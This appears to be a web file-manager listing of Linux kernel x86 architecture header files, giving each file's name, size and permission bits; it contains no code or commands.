dwarf2.h File 1.29 KB 0644
edac.h File 474 B 0644
efi.h File 13.49 KB 0644
elf.h File 11.92 KB 0644
elfcore-compat.h File 890 B 0644
emergency-restart.h File 202 B 0644
emulate_prefix.h File 484 B 0644
enclu.h File 181 B 0644
entry-common.h File 3.3 KB 0644
espfix.h File 426 B 0644
exec.h File 37 B 0644
extable.h File 1.82 KB 0644
extable_fixup_types.h File 2.34 KB 0644
fixmap.h File 5.95 KB 0644
floppy.h File 6.7 KB 0644
fpu.h File 221 B 0644
frame.h File 2.5 KB 0644
fred.h File 3.18 KB 0644
fsgsbase.h File 2.02 KB 0644
ftrace.h File 4.87 KB 0644
futex.h File 2.65 KB 0644
gart.h File 2.62 KB 0644
genapic.h File 22 B 0644
geode.h File 693 B 0644
gsseg.h File 1.35 KB 0644
hardirq.h File 2.52 KB 0644
highmem.h File 2.44 KB 0644
hpet.h File 2.89 KB 0644
hugetlb.h File 243 B 0644
hw_breakpoint.h File 2.04 KB 0644
hw_irq.h File 2.99 KB 0644
hyperv_timer.h File 177 B 0644
hypervisor.h File 2.3 KB 0644
i8259.h File 2.01 KB 0644
ia32.h File 1.74 KB 0644
ibt.h File 2.52 KB 0644
idtentry.h File 24.48 KB 0644
imr.h File 1.64 KB 0644
inat.h File 6.36 KB 0644
inat_types.h File 341 B 0644
init.h File 842 B 0644
insn-eval.h File 1.67 KB 0644
insn.h File 8.38 KB 0644
inst.h File 2.02 KB 0644
intel-family.h File 6.64 KB 0644
intel-mid.h File 624 B 0644
intel_ds.h File 947 B 0644
intel_pt.h File 1.25 KB 0644
intel_punit_ipc.h File 4.38 KB 0644
intel_telemetry.h File 3.66 KB 0644
invpcid.h File 1.45 KB 0644
io.h File 11.78 KB 0644
io_apic.h File 5.06 KB 0644
io_bitmap.h File 1.34 KB 0644
iomap.h File 536 B 0644
iommu.h File 965 B 0644
iosf_mbi.h File 7.21 KB 0644
irq.h File 1.22 KB 0644
irq_remapping.h File 1.98 KB 0644
irq_stack.h File 7.49 KB 0644
irq_vectors.h File 4.11 KB 0644
irq_work.h File 358 B 0644
irqdomain.h File 1.79 KB 0644
irqflags.h File 3.11 KB 0644
ist.h File 294 B 0644
jailhouse_para.h File 449 B 0644
jump_label.h File 1.47 KB 0644
kasan.h File 1.26 KB 0644
kaslr.h File 398 B 0644
kbdleds.h File 454 B 0644
kdebug.h File 1.06 KB 0644
kexec-bzimage64.h File 195 B 0644
kexec.h File 7.01 KB 0644
kfence.h File 1.59 KB 0644
kgdb.h File 2.09 KB 0644
kmsan.h File 2.75 KB 0644
kprobes.h File 3.21 KB 0644
kvm-x86-ops.h File 4.7 KB 0644
kvm-x86-pmu-ops.h File 782 B 0644
kvm_host.h File 73.84 KB 0644
kvm_page_track.h File 1.94 KB 0644
kvm_para.h File 4.13 KB 0644
kvm_types.h File 178 B 0644
kvm_vcpu_regs.h File 606 B 0644
kvmclock.h File 477 B 0644
linkage.h File 4.03 KB 0644
local.h File 4.18 KB 0644
mach_timer.h File 1.55 KB 0644
mach_traps.h File 1013 B 0644
math_emu.h File 395 B 0644
mc146818rtc.h File 2.77 KB 0644
mce.h File 13.51 KB 0644
mem_encrypt.h File 3.43 KB 0644
memtype.h File 853 B 0644
microcode.h File 2.17 KB 0644
misc.h File 143 B 0644
mman.h File 412 B 0644
mmconfig.h File 374 B 0644
mmu.h File 2.05 KB 0644
mmu_context.h File 7.01 KB 0644
module.h File 437 B 0644
mpspec.h File 1.86 KB 0644
mpspec_def.h File 4.16 KB 0644
mshyperv.h File 10.18 KB 0644
msi.h File 1.73 KB 0644
msr-index.h File 47.14 KB 0644
msr-trace.h File 1.35 KB 0644
msr.h File 11.44 KB 0644
mtrr.h File 5.47 KB 0644
mwait.h File 4.88 KB 0644
nmi.h File 1.34 KB 0644
nops.h File 2.24 KB 0644
nospec-branch.h File 17.28 KB 0644
numa.h File 1.73 KB 0644
numa_32.h File 256 B 0644
olpc.h File 2.33 KB 0644
olpc_ofw.h File 1.1 KB 0644
orc_header.h File 483 B 0644
orc_lookup.h File 1.04 KB 0644
orc_types.h File 2.13 KB 0644
page.h File 2.44 KB 0644
page_32.h File 680 B 0644
page_32_types.h File 2.34 KB 0644
page_64.h File 2.88 KB 0644
page_64_types.h File 3.07 KB 0644
page_types.h File 1.99 KB 0644
paravirt.h File 17.87 KB 0644
paravirt_api_clock.h File 26 B 0644
paravirt_types.h File 17.32 KB 0644
parport.h File 314 B 0644
pc-conf-reg.h File 723 B 0644
pci-direct.h File 850 B 0644
pci-functions.h File 654 B 0644
pci.h File 2.87 KB 0644
pci_x86.h File 6.7 KB 0644
percpu.h File 23.33 KB 0644
perf_event.h File 19.81 KB 0644
perf_event_p4.h File 26.12 KB 0644
pgalloc.h File 4.88 KB 0644
pgtable-2level.h File 3.29 KB 0644
pgtable-2level_types.h File 945 B 0644
pgtable-3level.h File 6.47 KB 0644
pgtable-3level_types.h File 1.1 KB 0644
pgtable-invert.h File 1.07 KB 0644
pgtable.h File 43.44 KB 0644
pgtable_32.h File 2.12 KB 0644
pgtable_32_areas.h File 1.55 KB 0644
pgtable_32_types.h File 634 B 0644
pgtable_64.h File 7.69 KB 0644
pgtable_64_types.h File 6.33 KB 0644
pgtable_areas.h File 623 B 0644
pgtable_types.h File 18.02 KB 0644
pkeys.h File 3.13 KB 0644
pkru.h File 1.31 KB 0644
platform_sst_audio.h File 3.03 KB 0644
pm-trace.h File 611 B 0644
posix_types.h File 144 B 0644
posted_intr.h File 2.89 KB 0644
preempt.h File 4.14 KB 0644
probe_roms.h File 273 B 0644
processor-cyrix.h File 383 B 0644
processor-flags.h File 1.79 KB 0644
processor.h File 19.7 KB 0644
prom.h File 845 B 0644
proto.h File 1.12 KB 0644
pti.h File 385 B 0644
ptrace.h File 11.96 KB 0644
purgatory.h File 237 B 0644
pvclock-abi.h File 1.5 KB 0644
pvclock.h File 2.74 KB 0644
qrwlock.h File 199 B 0644
qspinlock.h File 3.06 KB 0644
qspinlock_paravirt.h File 2.08 KB 0644
realmode.h File 2.11 KB 0644
reboot.h File 1.38 KB 0644
reboot_fixups.h File 183 B 0644
required-features.h File 2.68 KB 0644
resctrl.h File 5.03 KB 0644
rmwcc.h File 1.81 KB 0644
runtime-const.h File 1.67 KB 0644
seccomp.h File 1.18 KB 0644
sections.h File 490 B 0644
segment.h File 9.92 KB 0644
serial.h File 1.11 KB 0644
set_memory.h File 3.96 KB 0644
setup.h File 3.72 KB 0644
setup_arch.h File 77 B 0644
setup_data.h File 565 B 0644
sev-common.h File 7.69 KB 0644
sev.h File 15.12 KB 0644
sgx.h File 12.85 KB 0644
shmparam.h File 193 B 0644
shstk.h File 1.45 KB 0644
sigcontext.h File 261 B 0644
sigframe.h File 2.09 KB 0644
sighandling.h File 1.72 KB 0644
signal.h File 2.27 KB 0644
simd.h File 287 B 0644
smap.h File 1.44 KB 0644
smp.h File 4.63 KB 0644
softirq_stack.h File 216 B 0644
sparsemem.h File 830 B 0644
spec-ctrl.h File 3.02 KB 0644
special_insns.h File 7.22 KB 0644
spinlock.h File 1.19 KB 0644
spinlock_types.h File 253 B 0644
sta2x11.h File 352 B 0644
stackprotector.h File 2.65 KB 0644
stacktrace.h File 2.78 KB 0644
static_call.h File 2.99 KB 0644
string.h File 129 B 0644
string_32.h File 5.36 KB 0644
string_64.h File 2.5 KB 0644
suspend.h File 496 B 0644
suspend_32.h File 876 B 0644
suspend_64.h File 1.79 KB 0644
svm.h File 16.87 KB 0644
switch_to.h File 2.4 KB 0644
sync_bitops.h File 3.26 KB 0644
sync_core.h File 3.24 KB 0644
syscall.h File 3.49 KB 0644
syscall_wrapper.h File 9.02 KB 0644
syscalls.h File 374 B 0644
tdx.h File 3.42 KB 0644
text-patching.h File 5.55 KB 0644
thermal.h File 428 B 0644
thread_info.h File 8.17 KB 0644
time.h File 355 B 0644
timer.h File 989 B 0644
timex.h File 546 B 0644
tlb.h File 659 B 0644
tlbbatch.h File 332 B 0644
tlbflush.h File 11.69 KB 0644
topology.h File 8.74 KB 0644
trace_clock.h File 406 B 0644
trap_pf.h File 881 B 0644
trapnr.h File 1.7 KB 0644
traps.h File 1.52 KB 0644
tsc.h File 1.71 KB 0644
uaccess.h File 20.11 KB 0644
uaccess_32.h File 1.13 KB 0644
uaccess_64.h File 5.36 KB 0644
umip.h File 317 B 0644
unaccepted_memory.h File 742 B 0644
unistd.h File 1.59 KB 0644
unwind.h File 3.89 KB 0644
unwind_hints.h File 2.03 KB 0644
uprobes.h File 1017 B 0644
user.h File 2.2 KB 0644
user32.h File 2.11 KB 0644
user_32.h File 4.78 KB 0644
user_64.h File 5.07 KB 0644
vdso.h File 1.36 KB 0644
vermagic.h File 1.95 KB 0644
vga.h File 740 B 0644
vgtod.h File 422 B 0644
video.h File 497 B 0644
vm86.h File 2.15 KB 0644
vmalloc.h File 560 B 0644
vmware.h File 9.36 KB 0644
vmx.h File 27.23 KB 0644
vmxfeatures.h File 6.43 KB 0644
vsyscall.h File 988 B 0644
word-at-a-time.h File 1.98 KB 0644
x86_init.h File 11.89 KB 0644
xor.h File 10.39 KB 0644
xor_32.h File 14.54 KB 0644
xor_64.h File 716 B 0644
xor_avx.h File 4.53 KB 0644
Filemanager